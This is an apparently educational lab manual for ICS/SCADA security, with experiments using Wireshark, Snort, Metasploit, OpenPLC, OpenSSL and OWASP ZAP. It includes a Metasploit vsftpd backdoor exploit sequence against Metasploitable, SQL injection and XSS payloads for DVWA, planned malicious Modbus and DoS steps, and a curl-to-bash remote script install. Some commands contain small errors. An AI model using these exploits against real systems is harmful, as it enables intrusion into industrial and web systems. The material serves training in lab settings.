Cybersecurity Labs for Industrial Control Systems (ICS/SCADA)

Experiment 01: Network Traffic Analysis in ICS/SCADA

Tools

• Wireshark

Objectives

• Use Wireshark to capture and analyze network traffic to detect anomalies such as unauthorized commands or network scanning.

Deliverable

• A detailed report of traffic patterns and recommendations for mitigations.

Wireshark

Wireshark is a network protocol analyzer used to capture and inspect data packets in real time.

Installing Wireshark on Linux

1. Step 01: Update package lists: sudo apt update
2. Step 02: Install Wireshark: sudo apt install wireshark -y
3. Step 03: Allow non-root packet capture. When prompted, select to allow non-root users to capture packets. If not prompted, run:
   • sudo dpkg-reconfigure wireshark-common
   • sudo usermod -aG wireshark $USER
4. Step 04: Restart your session (log out and log back in, or reboot your system).
5. Step 05: Launch Wireshark: wireshark

Experiment Steps

1. Initial ping activity.
2. Being pinged.
3. Wireshark analysis: Normal packet view (from the image).
4. Wireshark analysis: During packet flooding (from the image).

Algorithm for Network Traffic Analysis in ICS/SCADA

1. Start capture.
2. Monitor for anomalies.
3. Check for traffic spikes.
4. Identify broadcast storms or flooding.
5. Analyze conversations.
6. Export and document.
7. Report and recommend.

Hardware Requirements

• Computer: 16GB RAM, 100GB SSD/HDD, Intel Core i5-3rd Gen (or equivalent).

Software Requirements

• Operating System that runs VirtualBox.
• VMware Workstation/Player installation.
• Disk image file of the virtual machine.

Result

The system's network stack can detect a ping flood via tools like Wireshark. Such traffic patterns can be flagged for defensive actions like rate-limiting or firewall filtering.

Experiment 02: IDS Configuration and Testing with Snort

Snort

Snort is an open-source Intrusion Detection and Prevention System (IDS/IPS) that monitors network traffic in real time to detect and block malicious activities.

IDS Configuration and Testing Algorithm with Snort

1. Install and configure Snort.
2. Write custom rules.
3. Validate rule syntax.
4. Simulate attacks.
5. Monitor alerts.
6. Evaluate performance.
7. Report results.

Software Requirements

• Operating System.
• Libraries and tools.

Hardware Requirements

• Processor: Dual-core.
• RAM: 500MB or more (for Snort and logs).
• Network Interface: Intel-branded NIC (or equivalent).

Steps for Execution

1. Install Snort: sudo apt install snort
2. Check Snort version: snort -v
3. Advanced Snort runtime and debugging commands: snort --help-commands
4. Basic Snort command-line help and usage options: snort --help
5. Network interface analysis: ip a
6. Monitoring and analyzing network traffic using Snort:
   • Terminal 01: Start Snort: sudo snort -I eth0 -d -e -v
   • Terminal 02: Generate network traffic using ping command: ping google.com
   • Terminal 01: Go back to Terminal 1 and press Ctrl + C.

Result

The program ran successfully and output was obtained.

Experiment 03: Vulnerability Assessment of Simulated ICS Network

Metasploitable

Metasploitable is a deliberately vulnerable virtual machine designed for testing and practicing penetration testing and security tools like Metasploit.

Hardware Requirements

• Desktop: 16GB RAM, virtualization support.
• Router/Switch.
• Raspberry Pi / PLCs (for simulated ICS environment).

Software Requirements

• Simulation tools.
• Virtualization software (e.g., VMware, VirtualBox).
• Security tools (e.g., Metasploit).

Steps for Execution

1. Install Metasploitable 2 and get its IP address using ifconfig. Copy the address.
2. Open Kali Linux, scan the network for open services, and paste the Metasploitable IP address: nmap -SV 192.168.87.131 (replace IP with your Metasploitable IP).
3. Start Metasploit: msfconsole
4. Search for the VSFTPD backdoor exploit: search vsftpd
5. Select the backdoor exploit: use exploit/unix/ftp/vsftpd_234_backdoor
6. Set the target's IP address (RHOST): set RHOST 192.168.87.131 (replace IP).
7. Run the exploit: exploit
8. Run the exploit command again until a successful session is established.

Result

The program ran successfully and output was obtained.

Experiment 04: Securing a PLC Environment

Tools Used

• OpenPLC: OpenPLC is an open-source industrial controller platform used for programming and running PLC (Programmable Logic Controller) applications.

Software Requirements

• Available for Windows, Linux, macOS, and real-time Linux.

Hardware Requirements

• CPU: Dual-core 1GHz.
• RAM: 2GB.
• Disk Space: 500MB free.

Installation of OpenPLC Runtime in Kali Linux

1. Install Git: sudo apt install git
2. Clone the OpenPLC Runtime repository: git clone https://github.com/thiagoralver/openPLC_V3.git
3. Navigate to the OpenPLC directory: cd openPLC_V3
4. Run the installation script: sudo ./install.sh Linux
5. Check if OpenPLC Runtime is running: ps aux | grep openplc
6. Check if port 8080 is in use: sudo netstat -tuln | grep 8080
7. Start the OpenPLC Runtime web server: sudo ./start_openplc.sh
8. Open your browser and go to https://localhost:8080. You should see the default login page.
9. The default OpenPLC login page should appear.
10. Log in with the following credentials:
    • Username: OpenPLC
    • Password: openPLC

Result

The program executed successfully and output was obtained.

Experiment 05: ICS Cyber Attack Simulation and Defense Design

Tools

• Metasploit Framework
• Security Onion

Requirements

• Operating System: Linux (e.g., Kali Linux, Ubuntu).

Metasploit Framework

The Metasploit Framework is an open-source tool widely used for penetration testing, ethical hacking, and security research.

Common Uses of Metasploit

• Penetration testing.
• Vulnerability research.
• Security auditing.
• Exploit development.

Algorithm

1. Set up ICS test environment.
2. Install Metasploit Framework.
3. Exploit engineering workstation.
4. Send malicious Modbus commands.
5. Launch DoS attacks.
6. Deploy Security Onion.
7. Analyze attacks.
8. Implement firewall rules.
9. Configure IDS/IPS rules.
10. Rerun attacks.
11. Document results.

Steps for Execution

1. Install dependencies: sudo apt update && sudo apt install -y curl gnupg ruby ruby-dev make libpcap-dev postgresql
2. Clone the Metasploit repository: git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
3. Install required gems: sudo gem install bundler
4. Install the bundle: sudo bundle install
5. Run Metasploit: ./msfconsole

Result

The program executed successfully and the output was obtained.

Experiment 06: Securing ICS Protocols and Communication Channels

Tools

• OpenSSL
• Wireshark

Hardware Requirements

• CPU.
• RAM: At least 512MB.
• Storage.
• Network with internet access.

Software Requirements

• Operating System: Linux, macOS, or Windows.

OpenSSL Framework

OpenSSL is an open-source toolkit that provides secure communication through the implementation of SSL and TLS protocols.

Key Features of OpenSSL

• SSL/TLS protocol support.
• Certificate generation and management.
• Cryptographic algorithms.
• Digital signature generation.
• Secure file encryption and decryption.

Algorithm

1. Capture baseline Modbus/TCP traffic using Wireshark to understand communication patterns.
2. Simulate unauthorized Modbus commands to generate malicious traffic.
3. Set up a secure tunnel to encrypt Modbus/TCP communication.
4. Reroute Modbus traffic through the encrypted tunnel.
5. Capture traffic logs.
6. Analyze and document differences in packet structure, payload visibility, and behavior.
7. Recommend protocol hardening.

Experiment Commands

1. Step 01: Install OpenSSL: sudo apt update && sudo apt install openssl
2. Step 02: Verify installation: openssl version
3. Step 03: Generate a self-signed certificate: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Experiment 07: Web Application Security for Industrial Systems

Tools

• OWASP ZAP

Algorithm

1. Set up OWASP ZAP and configure it as a proxy for web traffic.
2. Access the ICS web interface through a browser routed via ZAP.
3. Perform passive scanning to identify visible vulnerabilities.
4. Run active scans to test for issues like SQL injection and XSS.
5. Manually test authentication for weaknesses.
6. Review scan results and identify critical web security flaws.
7. Document each vulnerability with its risk and affected components.
8. Provide remediation steps for each issue.
9. Rescan after remediation to confirm vulnerabilities are resolved.

Hardware Requirements

• PCs or Laptops.
• Network equipment.
• Industrial system simulation environment.

Software Requirements

• Operating System: Ubuntu (or other Linux distribution).
• Virtualization software (e.g., VMware Workstation/Player, VirtualBox).
• Web application stack (e.g., DVWA).
• Cybersecurity tools: OWASP ZAP, Burp Suite, Metasploit Framework.

Steps for Execution

1. Search for DVWA (Damn Vulnerable Web Application) in Firefox and follow the installation steps to set it up.
2. Open the terminal (as root or with sudo). Execute the DVWA installation script (example, actual script may vary):
   sudo bash -c "$(curl -sL https://raw.githubusercontent.com/ethicalhackers/DVWA-script/main/install-dvwa.sh)"
   Then, install ZAP Proxy:
   sudo apt update && sudo apt install zaproxy -y
   Verify Apache2 status:
   sudo systemctl status apache2
3. In Firefox, navigate to http://localhost/DVWA/.
4. Set the DVWA security level to "low".
5. SQL Injection Test:
   • Select "SQL Injection".
   • For User ID, enter: ' or '1'='1
   • Click "Submit".
6. XSS (Reflected) Test:
   • Select "XSS (Reflected)".
   • For "What's your name:", enter: <script>alert('XSS vuln');</script>
   • Click "Submit".
7. Open a new terminal and launch ZAP Proxy: zaproxy
8. Once ZAP opens, select the "Automated Scan" option.
9. Enter the URL to attack: http://localhost/DVWA
10. Click "Attack".
11. After the scan completes, select "Generate Report".

Result

The program executed successfully and the output was obtained.